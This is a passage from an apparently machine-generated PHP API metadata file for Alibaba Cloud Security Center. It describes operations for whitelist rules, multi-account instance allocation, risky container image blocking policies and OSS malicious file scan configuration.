.'- ALL: all assets'."\n" .'- SELECTION_KEY: assets selected by using the asset selection component.', 'type' => 'string', 'required' => false, 'example' => 'ALL'], ], [ 'name' => 'TargetValue', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The target scope. Valid values:'."\n" .'- ALL: all assets'."\n" .'- Other values: the key of the asset scope selected by using the asset selection component.', 'type' => 'string', 'required' => false, 'example' => 'ALL'], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The business source. Valid values:'."\n" .'- agentless: agentless detection.', 'type' => 'string', 'required' => false, 'example' => 'agentless'], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'test'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'DuplicateRule', 'errorMessage' => 'Duplicated rule, please check whether the same rule already exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify a whitelist rule for agentless sensitive file detection alerts', 'summary' => 'Modifies a whitelist rule for agentless sensitive file detection alerts.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateMaliciousFileWhitelistConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateMaliciousFileWhitelistConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'MaliciousFileWhitelistConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:maliciousfilewhitelistconfig/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateMultiUserInstances' => [ 'summary' => 'Modify Multi-Account Instance Configuration', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'MemberInstances', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Member instances.', 'type' => 'array', 'items' => [ 'description' => 'Structure.', 'type' => 'object', 'properties' => [ 'OptType' => ['description' => 'Operation type. Values:'."\n" ."\n" .'- **ADD**: Add'."\n" ."\n" .'- **CHANGE**: Change'."\n" ."\n" .'- **DEL**: Delete', 'type' => 'string', 'required' => false, 'example' => 'CHANGE', 'title' => ''], 'ChargeType' => ['description' => 'Charge type, values:'."\n" ."\n" .'- **PREPAID**: Prepaid.'."\n" ."\n" .'- **POSTPAID** (default): Postpaid.', 'type' => 'string', 'required' => false, 'example' => 'PREPAID', 'title' => ''], 'AliUid' => ['description' => 'The Alibaba Cloud account UID of the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1766185894104675', 'title' => ''], 'InstanceId' => ['description' => 'The Cloud Security Center instance ID purchased by the member account.', 'type' => 'string', 'required' => false, 'example' => 'sas-p0anpb26my69', 'title' => ''], 'Version' => ['description' => 'The version of Cloud Security Center protection to be bound. Values:'."\n" ."\n" .'- **1**: Free Edition'."\n" ."\n" .'- **3**: Enterprise Edition'."\n" ."\n" .'- **5**: Advanced Edition'."\n" ."\n" .'- **6**: Antivirus Edition'."\n" ."\n" .'- **7**: Flagship Edition', 'type' => 'string', 'required' => false, 'example' => '7', 'title' => ''], 'Status' => ['description' => 'Status of the member account instance. Values:'."\n" ."\n" .'- **1**: Valid.'."\n" ."\n" .'- **2**: Invalid.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'SlsCapacity' => ['description' => 'Log storage capacity allocated to the member, in GB.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '10', 'title' => ''], 'AntiRansomwareCapacity' => ['description' => 'Anti-ransomware capacity allocated to the member, in GB.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '10', 'title' => ''], 'RaspCapacity' => ['description' => 'Application protection count allocated to the member. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '0', 'title' => ''], 'CspmCapacity' => ['description' => 'Cloud platform configuration check scan count allocated to the member. Unit: times per month.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '0', 'title' => ''], 'ThreatAnalysisCapacity' => ['description' => 'Threat analysis capacity allocated to the member. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '10', 'title' => ''], 'ThreatAnalysisFlow' => ['description' => 'Threat analysis and response log access traffic allocated to the member. Unit: GB/day.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '0', 'title' => ''], 'ImageScanCapacity' => ['description' => 'Image scan authorization count allocated to the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'WebLockCapacity' => ['description' => 'Web tamper-proof authorization count allocated to the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '0', 'title' => ''], 'HoneypotCapacity' => ['description' => 'Honeypot authorization count allocated to the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '0', 'title' => ''], 'SdkCapacity' => ['description' => 'Malicious file detection SDK authorization count allocated to the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '10', 'title' => ''], 'VersionSummary' => [ 'description' => 'Member account authorization usage information.', 'type' => 'array', 'items' => [ 'description' => 'Structure.', 'type' => 'object', 'properties' => [ 'Version' => ['description' => 'Version of the Cloud Security Center for the member account. Values:'."\n" ."\n" .'- **1**: Free Edition'."\n" ."\n" .'- **3**: Enterprise Edition'."\n" ."\n" .'- **5**: Advanced Edition'."\n" ."\n" .'- **6**: Antivirus Edition'."\n" ."\n" .'- **7**: Flagship Edition'."\n" ."\n" .'- **8**: Multiple Versions'."\n" ."\n" .'- **10**: Only Purchase Value-Added Services', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], 'EcsCount' => ['description' => 'Number of authorizations allocated to the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '3', 'title' => ''], 'CoreCount' => ['description' => 'Number of cores authorized for the member.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '6', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Structure.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem location.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], 'Result' => [ 'description' => 'Request processing result.', 'type' => 'array', 'items' => [ 'description' => 'Structure.', 'type' => 'object', 'properties' => [ 'AliUid' => ['description' => 'User UID.', 'type' => 'integer', 'format' => 'int64', 'example' => '****185894****', 'title' => ''], 'InstanceId' => ['description' => 'The Cloud Security Center instance ID purchased by the member account.', 'type' => 'string', 'example' => 'sas-p0anpb26****'."\n", 'title' => ''], 'UpdateStatus' => ['description' => 'Update status. Values:'."\n" ."\n" .'- **1**:Success'."\n" ."\n" .'- **2**:Failure', 'type' => 'string', 'example' => '1', 'title' => ''], 'ErrorMessage' => ['description' => 'Error message returned when the call fails.', 'type' => 'string', 'example' => 'Failed to update multi-user instance configuration', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Result\\": [\\n {\\n \\"AliUid\\": 0,\\n \\"InstanceId\\": \\"sas-p0anpb26****\\\\n\\",\\n \\"UpdateStatus\\": \\"1\\",\\n \\"ErrorMessage\\": \\"Failed to update multi-user instance configuration\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'Authorization Allocation Management', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateMultiUserInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateMultiUserInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateOpaStrategyNew' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The policy ID.'."\n" .'>Call the [ListOpaClusterStrategyNew](~~2623574~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1003', 'title' => ''], ], [ 'name' => 'StrategyTemplateId', 'in' => 'query', 'schema' => ['description' => 'The policy template ID.'."\n" .'>Call the [GetOpaStrategyTemplateSummary](~~2539952~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '109', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.'."\n" ."\n" .'>This parameter is deprecated. Use the Scopes parameter to specify the scope of clusters to which the policy applies.>.', 'type' => 'string', 'required' => false, 'example' => 'c870ec78ecbcb41d2a35c679823ef****', 'title' => ''], ], [ 'name' => 'StrategyName', 'in' => 'query', 'schema' => ['description' => 'The policy name.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Description', 'in' => 'query', 'schema' => ['description' => 'The policy description.', 'type' => 'string', 'required' => false, 'example' => '4566', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The cluster name.'."\n" .'>This parameter is deprecated.>.', 'type' => 'string', 'required' => false, 'example' => 'docker-law', 'title' => ''], ], [ 'name' => 'UnScanedImage', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the policy supports unscanned images. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'MaliciousImage', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the policy supports Internet malicious images. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'ImageName', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of image names included in the policy.', 'type' => 'array', 'items' => ['description' => 'The image name.'."\n" .'> Call the [GetOpaClusterImageList](~~2539885~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'muximux:latest', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Label', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of image tags included in the policy.', 'type' => 'array', 'items' => ['description' => 'The image tag.'."\n" .'> Call the [GetOpaClusterLabelList](~~2539885~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'alertmanager:main', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => ['description' => 'The action to take when the policy is hit. Valid values:'."\n" ."\n" .'- **1**: Alert.'."\n" .'- **2**: Block.'."\n" .'- **3**: Allow.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'WhiteList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The whitelist.', 'type' => 'array', 'items' => ['description' => 'The name of the image added to the whitelist.', 'type' => 'string', 'required' => false, 'example' => 'repo-016', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'AlarmDetail', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The alert content details included in the policy.', 'type' => 'object', 'properties' => [ 'Baseline' => [ 'description' => 'The baseline risk information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'required' => false, 'example' => 'medium', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The baseline item information.', 'type' => 'array', 'items' => [ 'description' => 'The baseline item information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The baseline check item ID.'."\n" .'> Call the [GetOpaClusterBaseLineList](~~2539883~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'hc.image.checklist.identify.hc_exploit_couchdb_linux.item'."\n", 'title' => ''], 'Name' => ['description' => 'The baseline check item name.'."\n" .'> Call the [GetOpaClusterBaseLineList](~~2539883~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'passwd', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'Vul' => [ 'description' => 'The vulnerability item information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The vulnerability list.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability list.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The vulnerability ID.'."\n" .'> Call the [DescribeVulListPage](~~471928~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2023-36034'."\n", 'title' => ''], 'Name' => ['description' => 'The vulnerability name.'."\n" .'> Call the [DescribeVulListPage](~~471928~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'oval:com.redhat.rhsa:def:20227002', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], 'RiskClass' => [ 'description' => 'The list of vulnerability types.', 'type' => 'array', 'items' => [ 'description' => 'The list of vulnerability types.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The vulnerability type ID. Valid values:'."\n" .'- **cve**: system vulnerability'."\n" .'- **app**: application vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], 'Name' => ['description' => 'The vulnerability type name. Valid values:'."\n" .'- **system vulnerability**'."\n" .'- **application vulnerability**', 'type' => 'string', 'required' => false, 'example' => '系统漏洞', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'MaliciousFile' => [ 'description' => 'The malicious sample information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'required' => false, 'example' => 'medium', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The malicious sample list.', 'type' => 'array', 'items' => [ 'description' => 'The malicious sample list.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The malicious sample ID.'."\n" .'> Call the [DescribeMatchedMaliciousNames](~~DescribeMatchedMaliciousNames~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => '65201', 'title' => ''], 'Name' => ['description' => 'The malicious sample name.'."\n" .'> Call the [DescribeMatchedMaliciousNames](~~DescribeMatchedMaliciousNames~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'abnormal binary file', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'SensitiveFile' => [ 'description' => 'The sensitive file information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" ."\n" .'- **medium**: Medium.'."\n" ."\n" .'- **low**: Low.', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The list of sensitive file check items.', 'type' => 'array', 'items' => [ 'description' => 'The list of sensitive file check items.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The sensitive file type ID.'."\n" .'> Call the [GetSensitiveDefineRuleConfig](~~GetSensitiveDefineRuleConfig~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'key', 'title' => ''], 'Name' => ['description' => 'The sensitive file type name.'."\n" .'> Call the [GetSensitiveDefineRuleConfig](~~GetSensitiveDefineRuleConfig~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'name', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'BuildRisk' => [ 'description' => 'The risky image build command information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The list of risk items.', 'type' => 'array', 'items' => [ 'description' => 'The list of risk items.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The risky image build command type ID.'."\n" .'> Call the [ListImageBuildRiskItem](~~ListImageBuildRiskItem~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'key', 'title' => ''], 'Name' => ['description' => 'The risky image build command type name.'."\n" .'> Call the [ListImageBuildRiskItem](~~ListImageBuildRiskItem~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'name', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Scopes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The scope of the policy.', 'type' => 'array', 'items' => [ 'description' => 'The scope of the policy.', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the container cluster.'."\n" .'> Call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cdcb56a931c**', 'title' => ''], 'AllNamespace' => ['description' => 'Specifies whether all namespaces are included. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'NamespaceList' => [ 'description' => 'The list of namespaces.'."\n" ."\n" .'>This parameter takes effect only when AllNamespace is set to 0.>.', 'type' => 'array', 'items' => ['description' => 'The list of namespaces.', 'type' => 'string', 'required' => false, 'example' => 'm1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], 'AckPolicyInstanceId' => ['description' => 'The policy instance ID in the cluster.'."\n" .'> Call the [GetOpaStrategyDetailNew](~~GetOpaStrategyDetailNew~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ack-1', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. Use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'F75B5FF5-DCB2-59CE-8978-08510707A9E6', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'Data' => [ 'description' => 'The cluster ID for which the update failed.', 'type' => 'array', 'items' => ['description' => 'The cluster ID for which the update failed.', 'type' => 'string', 'example' => '[\'c8d**7614df1bf\']', 'title' => ''], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update risky image blocking policy', 'summary' => 'Updates the risky image blocking policy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateOpaStrategyNew'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateOpaStrategyNew', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"F75B5FF5-DCB2-59CE-8978-08510707A9E6\\",\\n \\"HttpStatusCode\\": 200,\\n \\"Data\\": [\\n \\"[\'c8d**7614df1bf\']\\"\\n ]\\n}","type":"json"}]', ], 'UpdateOssScanConfig' => [ 'summary' => 'Updates the scan policy configuration for OSS file detection under the malicious file detection feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '172828', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Enable', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the scan policy. Valid values:'."\n" .'- **1**: Enable.'."\n" .'- **0**: Disable.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'ScanDayList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The scan days. The number indicates the day of the week.', 'type' => 'array', 'items' => ['description' => 'The scan days. The number indicates the day of the week.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'BucketNameList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of bucket names.', 'type' => 'array', 'items' => ['description' => 'The bucket name.', 'type' => 'string', 'required' => false, 'example' => 'hz-new02****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'KeySuffixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of file suffixes.', 'type' => 'array', 'items' => ['description' => 'Specifies that the key of the file to be scanned must end with the specified suffix.', 'type' => 'string', 'required' => false, 'example' => '.asp', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The scan start time in the HH:mm:ss format.', 'type' => 'string', 'required' => false, 'example' => '00:00:00'."\n", 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The scan end time in the HH:mm:ss format.', 'type' => 'string', 'required' => false, 'example' => '00:00:01', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The scan policy ID.', 'type' => 'string', 'required' => false, 'example' => '1141****', 'title' => ''], ], [ 'name' => 'KeyPrefixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The prefix list of files.', 'type' => 'array', 'items' => ['description' => 'Specifies that the key of the file to be scanned must start with the specified KeyPrefix. The value cannot start with a forward slash (/).', 'type' => 'string', 'required' => false, 'example' => '/root', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The scan policy name.', 'type' => 'string', 'required' => false, 'example' => 'testStrategy', 'title' => ''], ], [ 'name' => 'AllKeyPrefix', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to match all file prefixes.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'DecompressMaxLayer', 'in' => 'query', 'schema' => ['description' => 'The maximum number of decompression layers for nested compressed files. Minimum value: 1. Maximum value: 5. If the maximum number of decompression layers is exceeded, the decompression operation stops. The detection of already decompressed files is not affected.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DecompressMaxFileCount', 'in' => 'query', 'schema' => ['description' => 'The maximum number of files to decompress. Minimum value: 1. Maximum value: 1000. If the maximum number of decompressed files is exceeded, the decompression operation stops. The detection of already decompressed files is not affected.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'DecryptionList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of decryption types.', 'type' => 'array', 'items' => ['description' => 'The decryption type. Valid values:'."\n" ."\n" .'- **OSS**: OSS fully managed.'."\n" .'- **KMS**: KMS.', 'type' => 'string', 'required' => false, 'example' => 'KMS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'LastModifiedStartTime', 'in' => 'query', 'schema' => ['description' => 'Scans files whose last modification time is after the specified timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1724301769834', 'title' => ''], ], [ 'name' => 'RealTimeIncr', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable real-time incremental detection. If this parameter is set to true, the ScanDayList, StartTime, and EndTime parameters do not take effect.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID generated by Alibaba Cloud for this request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FFA14F61-4E2F-54C7-9276-81C60BAC****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update scan policy configuration', 'changeSet' => [], 